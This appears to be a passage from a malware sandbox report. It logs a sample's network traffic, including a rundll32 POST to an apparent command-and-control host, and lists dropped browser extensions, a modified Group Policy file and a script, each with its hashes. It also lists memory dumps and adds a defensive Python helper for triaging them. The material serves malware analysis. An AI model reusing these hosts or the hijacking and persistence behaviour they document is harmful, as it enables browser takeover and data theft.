                                                                                                                        http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt
                                                                                                                        http
                                                                                                                        mqcBDmi.exe
                                                                                                                        1.1kB
                                                                                                                        2.3kB
                                                                                                                        8
                                                                                                                        5
                                                                                                                        HTTP Request: GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCmrOqyXa%2F%2FgRBajssQLKXU
                                                                                                                        HTTP Response: 200
                                                                                                                        HTTP Request: GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCRq%2FXldMamzQqGAD6YrjKf
                                                                                                                        HTTP Response: 200
                                                                                                                        HTTP Request: GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD3beG9%2FyAiiwlbAUunjQwt
                                                                                                                        HTTP Response: 200
                                                                                                                      • 172.217.16.238:443
                                                                                                                        https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM
                                                                                                                        tls, http
                                                                                                                        mqcBDmi.exe
                                                                                                                        1.1kB
                                                                                                                        8.6kB
                                                                                                                        10
                                                                                                                        12
                                                                                                                        HTTP Request: GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&dbseKAAkBM
                                                                                                                        HTTP Response: 302
                                                                                                                      • 142.250.187.225:443
                                                                                                                        https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        tls, http
                                                                                                                        mqcBDmi.exe
                                                                                                                        1.6kB
                                                                                                                        37.8kB
                                                                                                                        20
                                                                                                                        31
                                                                                                                        HTTP Request: GET https://clients2.googleusercontent.com/crx/blobs/Af2yII1ndlPDSZOakU4Pf4dRwz2i7NEBSdkCxXz6p-VxI8k8ALZJYhy93dUG5dQTpZLFWhmC3leh78jLFqRLDDDZuoV3r2mP7_mi-THl3KqBKyrYG6_XAMZSmuXhyNZZWqODP_YYDvMQ-Mm7WqsGMg/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                        HTTP Response: 200
                                                                                                                      • 44.237.52.63:80
                                                                                                                        http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                                        http
                                                                                                                        rundll32.exe
                                                                                                                        1.2kB
                                                                                                                        536 B
                                                                                                                        5
                                                                                                                        3
                                                                                                                        HTTP Request: POST http://api5.check-data.xyz/api2/google_api_ifi
                                                                                                                        HTTP Response: 200
                                                                                                                      • 8.8.8.8:53
                                                                                                                        service-domain.xyz
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        64 B
                                                                                                                        80 B
                                                                                                                        1
                                                                                                                        1
                                                                                                                        DNS Request: service-domain.xyz
                                                                                                                        DNS Response: 54.210.117.250

                                                                                                                      • 8.8.8.8:53
                                                                                                                        c.pki.goog
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        56 B
                                                                                                                        107 B
                                                                                                                        1
                                                                                                                        1
                                                                                                                        DNS Request: c.pki.goog
                                                                                                                        DNS Response: 216.58.201.99

                                                                                                                      • 8.8.8.8:53
                                                                                                                        o.pki.goog
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        56 B
                                                                                                                        107 B
                                                                                                                        1
                                                                                                                        1
                                                                                                                        DNS Request: o.pki.goog
                                                                                                                        DNS Response: 216.58.201.99

                                                                                                                      • 8.8.8.8:53
                                                                                                                        clients2.google.com
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        65 B
                                                                                                                        105 B
                                                                                                                        1
                                                                                                                        1
                                                                                                                        DNS Request: clients2.google.com
                                                                                                                        DNS Response: 172.217.16.238

                                                                                                                      • 8.8.8.8:53
                                                                                                                        clients2.googleusercontent.com
                                                                                                                        dns
                                                                                                                        mqcBDmi.exe
                                                                                                                        76 B
                                                                                                                        121 B
                                                                                                                        1
                                                                                                                        1
                                                                                                                        DNS Request: clients2.googleusercontent.com
                                                                                                                        DNS Response: 142.250.187.225

                                                                                                                      • 8.8.8.8:53
                                                                                                                        api5.check-data.xyz
                                                                                                                        dns
                                                                                                                        rundll32.exe
                                                                                                                        65 B
                                                                                                                        159 B
                                                                                                                        1
                                                                                                                        1
                                                                                                                        DNS Request: api5.check-data.xyz
                                                                                                                        DNS Response: 44.237.52.63, 44.240.96.128

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\NFFblPWVSTUU2\ZcASiPD.xml
                                                                                                                        Filesize: 2KB
                                                                                                                        MD5: 0fa3ee4d9e000ab80a8377412e40aea5
                                                                                                                        SHA1: 234952aa8b42c7bee376f18719b7c3997e343a2c
                                                                                                                        SHA256: 65170c66c742eea1b9dda450e10a2c61a4ca7f54ba9542251aa9f3cc917cdcc0
                                                                                                                        SHA512: 1cea62f5d00370ddce0c5a80ad64d16603dc667a168d763dd0d4ab912482281ea93800cf3e94440ec4201a4e1f3dee81c60ea9653e9ca78e2ae86e0124849a2d

                                                                                                                      • C:\Program Files (x86)\OniiUkVuU\ZBTPGyo.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        5f73e487983b4078b7a4e0ce779ae659

                                                                                                                        SHA1

                                                                                                                        5a7b2dc95cffd2be91ae120d6adf18edadde41a1

                                                                                                                        SHA256

                                                                                                                        0d0eb0e1e51e93f83ec4b78c229d6e0ec96992b35357d061de1a650f6eb93ab6

                                                                                                                        SHA512

                                                                                                                        9e5c928113a13a6e49162645264b14e0b08c25da0a23779189a41c113a82a66b38ee8a1b72208917d99d1e5ea0b3fb4aa9272c2cf8ee152fe7efeeb2862deb06

                                                                                                                      • C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\XkZlrsM.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        8bed20c1e99dceb6c33358baac76c83c

                                                                                                                        SHA1

                                                                                                                        4b0fd8d39dff2c267e4bc2f20ffa5929cf240c88

                                                                                                                        SHA256

                                                                                                                        c0e4495fcf860f7d6d996029f1ee92c97909d8734a52517985fd956c11c3745c

                                                                                                                        SHA512

                                                                                                                        206689d889b79233f15c6d9a7a695205cfb3974db2311364d2c7421d01703d080be7965e8caf42e6cca6d6110cbd23495cb73101adcae6008168c408efcb53dd

                                                                                                                      • C:\Program Files (x86)\oMPLyiqsgsRtC\xaXYsNF.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        3fe455cfcd6e5dd975d9f187fb65cd34

                                                                                                                        SHA1

                                                                                                                        656fdba3928bc531ec141dcfdaa1a44d7afa2333

                                                                                                                        SHA256

                                                                                                                        981aa67ca99c3a33857e9a8dc90fcebb484c4b11dd8376d72807b30a7d304c84

                                                                                                                        SHA512

                                                                                                                        c64950a01e922407343d69ad6438bd1797b1bb60500b781face781e1317799dba2e5b5459fc839d3362cd84a886e23b45a7605a380d9bcb6195d5e32a669faa0

                                                                                                                      • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                        Filesize

                                                                                                                        2.0MB

                                                                                                                        MD5

                                                                                                                        72fdf8c3aa0291d4a1fc62fe5094f6c3

                                                                                                                        SHA1

                                                                                                                        113a9cd974719e09496a7d5d679e50aa1e07dec1

                                                                                                                        SHA256

                                                                                                                        e4bd8e2d233fbfe9a82acac861e72a283e328304af9d1ec3b0d51587f8536018

                                                                                                                        SHA512

                                                                                                                        6d91d6e40d3f9e228bb63703a99e1c691dc813346f449a60801d034e768905deda23a1676f5b7577f51af869c7ee3c7805397dc7bba0de08cba3931c9adf74a1

                                                                                                                      • C:\ProgramData\RfQdYYQjhFJxkqVB\qWvhJeI.xml

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        2e43d9caee317be772d5865044ebd599

                                                                                                                        SHA1

                                                                                                                        ea580b7e30297260ac8f7d2e32dd58136c9f3f50

                                                                                                                        SHA256

                                                                                                                        92c5ce1008a77e6a337c722e59840dd0b19535bddaf89989cdb108f8f408150e

                                                                                                                        SHA512

                                                                                                                        8e52863f137b0541ef54d6a94900d2cf90133a9001c6aad1da9b3ab6286fdad9dc2dc28334f05aacd143f97180de575ce528246dc12107e777064301f56aac91

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                        Filesize

                                                                                                                        187B

                                                                                                                        MD5

                                                                                                                        2a1e12a4811892d95962998e184399d8

                                                                                                                        SHA1

                                                                                                                        55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                        SHA256

                                                                                                                        32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                        SHA512

                                                                                                                        bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                        Filesize

                                                                                                                        136B

                                                                                                                        MD5

                                                                                                                        238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                        SHA1

                                                                                                                        0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                        SHA256

                                                                                                                        801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                        SHA512

                                                                                                                        2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                        Filesize

                                                                                                                        150B

                                                                                                                        MD5

                                                                                                                        0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                        SHA1

                                                                                                                        6a51537cef82143d3d768759b21598542d683904

                                                                                                                        SHA256

                                                                                                                        0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                        SHA512

                                                                                                                        5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        89435c5bc9dfda06de8f396f8a0d81b4

                                                                                                                        SHA1

                                                                                                                        1a27ae517a0780341c8da8ffe73f4faffe938af2

                                                                                                                        SHA256

                                                                                                                        b3a8874bcb56ceb3716acf384b51909584f818f0c00b38e0ad577e430100a850

                                                                                                                        SHA512

                                                                                                                        d030c0f4e40255ed5be71823890ddc0571ef889bd45da80b8b2ec2a5fe1977c3d5101e5cc0a292b464edbf5a9ce5dc2abc7297df4e7a93d1792f5c5265349b9b

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                        Filesize

                                                                                                                        28KB

                                                                                                                        MD5

                                                                                                                        be2e808ba83ddd46589230269c09349e

                                                                                                                        SHA1

                                                                                                                        bc0910ddc43b156b4500b98482e42fe33c2be115

                                                                                                                        SHA256

                                                                                                                        ea81cc656e59a1c93bc2689b3904098b8b84aa908993acadcb74dd8ecb657ff4

                                                                                                                        SHA512

                                                                                                                        3c8759d477e63dd186f137c9d5e53993843bdff3dad77dfc7bea6d9c71276dc3b28c2b1758d8119499cc8de9bdc429c008baf695433a3382ff3e029fa39a03da

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        068ec4d21f758f843bbacaaae9fd4dbd

                                                                                                                        SHA1

                                                                                                                        2e5403c2be065482c564316fba44e72694adb3ad

                                                                                                                        SHA256

                                                                                                                        4de992193cdd56f6d5ad2b40f11e616d92a2f559e916709ce5519e9ae4a97fa2

                                                                                                                        SHA512

                                                                                                                        7d9b06112286e8f7cc31b8620e266156869a00e1b8ac8d63278af2f17696328982c1aaa52795ad5cbdfb870e5c1e73038a09c61b3f926cd3e658f3d7943bf795

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGQY2JCD3RR2IV34YIY9.temp

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        484b85bac5416ab7c6176e5007578d58

                                                                                                                        SHA1

                                                                                                                        1c9b18855954d435528b553e9ec36628b23b4c72

                                                                                                                        SHA256

                                                                                                                        809524c9732c57fa5ce87dd80eeef6bbdc5429fcbe79dc48138994a5d7a308da

                                                                                                                        SHA512

                                                                                                                        e16def92b77df8aba6cbb382097ae111dfbbc4e63fcbf01cab6c63c3fdbee838460bbb771d7a0ac81b4b26f0aecdb32c5c90ffba8db1203dd90c5b793fea461b

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\nndpnsl0.default-release\prefs.js

                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        e824537284aef6f669e36d56a9b9b762

                                                                                                                        SHA1

                                                                                                                        53ec878c15388fdb4e01f754d5f53e968851fc0c

                                                                                                                        SHA256

                                                                                                                        53d6ee650158647c186941019fdc0593d91568fb2a7fa9e3a4d8c21c73c07527

                                                                                                                        SHA512

                                                                                                                        de0d57725890728b6e078c1bb05c4e7fd1836e501ec8e188913066a91f6ee9c36d4dc9e33c0e9b2373c0ce12751a6e2ed29855015ff23a7ff77ec01afdbf6b12

                                                                                                                      • C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        838a6d63c3a927d217af6e2237ff9d0a

                                                                                                                        SHA1

                                                                                                                        40f6ab07322fc4c6d03e5783b20fbe0f9334c79a

                                                                                                                        SHA256

                                                                                                                        18db848096e080dcb7d0af3334e2bacc2f80347c0b35df6812856020d03e9b21

                                                                                                                        SHA512

                                                                                                                        0dd1e102d64e58879228e9d6a27980ef8aa9fe8b51b13d045a4f14a098b6e8629f2123ee64869bc3f0d813d297682ed78f87adc8fdb4ecab1153558d8a13a2f6

                                                                                                                      • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        fe6a7fa86ce140d679b064af06b23da0

                                                                                                                        SHA1

                                                                                                                        dec23a9ac5c7016f0f7138b0f01a9303f9656ae3

                                                                                                                        SHA256

                                                                                                                        4e91f35ba55feae7fc1a838dec9db840c96b73e0875bcfb8513e111bf88e43df

                                                                                                                        SHA512

                                                                                                                        6767722bfcb6bb8dbe9b80d9c298770bdf904b6354e567d161e5c2b29df7f14f9c623e5ea5f8cfbd3ebd0c79d085fcb50a60bac3974ee2c35943de6d5dd858fd

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS41D1.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        b6c0ddbcd0713b164497514c4d908831

                                                                                                                        SHA1

                                                                                                                        88638a95176133465505bea6f780e952e20e0217

                                                                                                                        SHA256

                                                                                                                        3690ea841d737d1505221476dcba9574e0361459d59eb1103d74b99b56ff2d76

                                                                                                                        SHA512

                                                                                                                        c85b8ea406f2d5bd6f73903cdcf66d6bd7e84e7a374b8e3051a4bb479890ef34a0735883b6b84df5f9181632ef198a096812d9c08752320c75acc13024007004

                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS4441.tmp\Install.exe

                                                                                                                        Filesize

                                                                                                                        6.7MB

                                                                                                                        MD5

                                                                                                                        115546cac410b9675cb9347e7cf7d64a

                                                                                                                        SHA1

                                                                                                                        1302b93e02fae2423d22c47e82cab233c07c5f7b

                                                                                                                        SHA256

                                                                                                                        0dbe6c46489c63ff8c3638be1ea4657a226978643fd3411df5b56196a052e67c

                                                                                                                        SHA512

                                                                                                                        5d6db68fe38e7797fea57ee06397365c063179fed0855b4728a18bfa2f8785fd2190a9b3e14e39e2d66ba04410066b313a3169cebfa11c3e0c70e902b9f89a9f

                                                                                                                      • \Windows\Temp\RkUDfeHyKRZhrXlO\WfvRaOTI\cIkMdBo.dll

                                                                                                                        Filesize

                                                                                                                        6.4MB

                                                                                                                        MD5

                                                                                                                        e1e4349f77244f2529eca36471a1b3c4

                                                                                                                        SHA1

                                                                                                                        e71982e57783d0cdc2464b0033f1636076b8ebb3

                                                                                                                        SHA256

                                                                                                                        45fe506d58bd345b130409725086d7ecbcd237731b793ff5fc8ee087c7b3ed56

                                                                                                                        SHA512

                                                                                                                        b2f087bab7963b17a0676432bc54494ed5e30950d63bd5d61f128557235991b5bb74b05e851a4f1fdf97b3af9b0559d817f77046c0a57b896ab7f5fd833f1f7c

• memory/580-52-0x00000000022A0000-0x00000000022A8000-memory.dmp (Filesize 32KB)
• memory/580-51-0x000000001B6E0000-0x000000001B9C2000-memory.dmp (Filesize 2.9MB)
• memory/1104-355-0x0000000001520000-0x000000000606A000-memory.dmp (Filesize 75.3MB)
• memory/1700-61-0x000000001B5F0000-0x000000001B8D2000-memory.dmp (Filesize 2.9MB)
• memory/1700-62-0x0000000001F00000-0x0000000001F08000-memory.dmp (Filesize 32KB)
• memory/2352-35-0x0000000002270000-0x0000000002926000-memory.dmp (Filesize 6.7MB)
• memory/2352-22-0x0000000002270000-0x0000000002926000-memory.dmp (Filesize 6.7MB)
• memory/2712-37-0x0000000001580000-0x0000000001C36000-memory.dmp (Filesize 6.7MB)
• memory/2712-36-0x0000000000EC0000-0x0000000001576000-memory.dmp (Filesize 6.7MB)
• memory/2712-28-0x0000000010000000-0x0000000014B4A000-memory.dmp (Filesize 75.3MB)
• memory/2712-23-0x0000000000EC0000-0x0000000001576000-memory.dmp (Filesize 6.7MB)
• memory/2712-26-0x0000000001580000-0x0000000001C36000-memory.dmp (Filesize 6.7MB)
• memory/2712-25-0x0000000001580000-0x0000000001C36000-memory.dmp (Filesize 6.7MB)
• memory/2712-24-0x0000000001580000-0x0000000001C36000-memory.dmp (Filesize 6.7MB)
• memory/2840-40-0x0000000001180000-0x0000000001836000-memory.dmp (Filesize 6.7MB)
• memory/2840-83-0x0000000001180000-0x0000000001836000-memory.dmp (Filesize 6.7MB)
• memory/2840-63-0x0000000001180000-0x0000000001836000-memory.dmp (Filesize 6.7MB)
• memory/2840-41-0x0000000010000000-0x0000000014B4A000-memory.dmp (Filesize 75.3MB)
• memory/3060-130-0x0000000001B30000-0x0000000001B97000-memory.dmp (Filesize 412KB)
• memory/3060-96-0x0000000001850000-0x00000000018D5000-memory.dmp (Filesize 532KB)
• memory/3060-86-0x0000000010000000-0x0000000014B4A000-memory.dmp (Filesize 75.3MB)
• memory/3060-327-0x00000000038B0000-0x0000000003981000-memory.dmp (Filesize 836KB)
• memory/3060-82-0x0000000000360000-0x0000000000A16000-memory.dmp (Filesize 6.7MB)
• memory/3060-358-0x0000000000360000-0x0000000000A16000-memory.dmp (Filesize 6.7MB)
• memory/3060-313-0x00000000025A0000-0x000000000262A000-memory.dmp (Filesize 552KB)
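The dump names above follow the pattern memory/<pid>-<index>-<start>-<end>-memory.dmp. The Python below is an added triage helper, not part of this report or of the sandbox's own tooling: it parses that pattern, checks each listed Filesize against the address range in the name, and groups regions that show up in more than one process, which is the quickest way to spot an image that has been mapped or injected into several PIDs. Treating the two hex values as the region's start and end is an assumption, though it agrees with every Filesize on this page. The sample entries are copied from the listing above rather than captured live.

```python
import re
from collections import defaultdict

# Assumed naming pattern (matches the entries on this page):
# memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Sample input: a subset of the listing above, with the Filesize the report shows.
SAMPLE = [
    ("memory/580-52-0x00000000022A0000-0x00000000022A8000-memory.dmp", "32KB"),
    ("memory/1104-355-0x0000000001520000-0x000000000606A000-memory.dmp", "75.3MB"),
    ("memory/2352-22-0x0000000002270000-0x0000000002926000-memory.dmp", "6.7MB"),
    ("memory/2712-28-0x0000000010000000-0x0000000014B4A000-memory.dmp", "75.3MB"),
    ("memory/2712-23-0x0000000000EC0000-0x0000000001576000-memory.dmp", "6.7MB"),
    ("memory/2840-41-0x0000000010000000-0x0000000014B4A000-memory.dmp", "75.3MB"),
    ("memory/3060-86-0x0000000010000000-0x0000000014B4A000-memory.dmp", "75.3MB"),
    ("memory/3060-82-0x0000000000360000-0x0000000000A16000-memory.dmp", "6.7MB"),
    ("memory/3060-130-0x0000000001B30000-0x0000000001B97000-memory.dmp", "412KB"),
]


def parse_dump_name(name):
    """Return (pid, index, start, end) for a dump name, or None if it does not match."""
    m = DUMP_RE.match(name)
    if not m:
        return None
    return (int(m["pid"]), int(m["idx"]), int(m["start"], 16), int(m["end"], 16))


def human_size(nbytes):
    """Format a byte count the way the report does: one decimal for MB, whole KB below that."""
    if nbytes >= 1024 * 1024:
        return f"{nbytes / (1024 * 1024):.1f}MB"
    return f"{nbytes // 1024}KB"


def check_sizes(entries):
    """Return names whose listed Filesize disagrees with the range encoded in the name
    (or that do not parse at all)."""
    bad = []
    for name, listed in entries:
        parsed = parse_dump_name(name)
        if parsed is None or human_size(parsed[3] - parsed[2]) != listed:
            bad.append(name)
    return bad


def shared_regions(entries):
    """Group dumps by (size, base) and keep groups seen in more than one PID.
    Same size at the same base across processes is what an image with a fixed
    preferred base looks like when it is loaded into, or injected into, each of them."""
    groups = defaultdict(set)
    for name, _ in entries:
        parsed = parse_dump_name(name)
        if parsed is None:
            continue
        pid, _, start, end = parsed
        groups[(end - start, start)].add(pid)
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def sizes_in_multiple_pids(entries):
    """Looser grouping by size alone; catches the same image mapped at different bases."""
    by_size = defaultdict(set)
    for name, _ in entries:
        parsed = parse_dump_name(name)
        if parsed is not None:
            pid, _, start, end = parsed
            by_size[end - start].add(pid)
    return {s: sorted(p) for s, p in by_size.items() if len(p) > 1}


if __name__ == "__main__":
    print("size mismatches:", check_sizes(SAMPLE))
    for (size, base), pids in shared_regions(SAMPLE).items():
        print(f"{human_size(size)} at 0x{base:08X} in PIDs {pids}")
    for size, pids in sizes_in_multiple_pids(SAMPLE).items():
        print(f"{human_size(size)} present in PIDs {pids}")
```

On the sample, the 75.3MB region at 0x10000000 groups PIDs 2712, 2840 and 3060, and grouping by size alone adds PID 1104 (where the same-sized region sits at 0x1520000) and shows the 6.7MB region in 2352, 2712 and 3060 at three different bases; those are the dumps worth diffing or scanning first.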
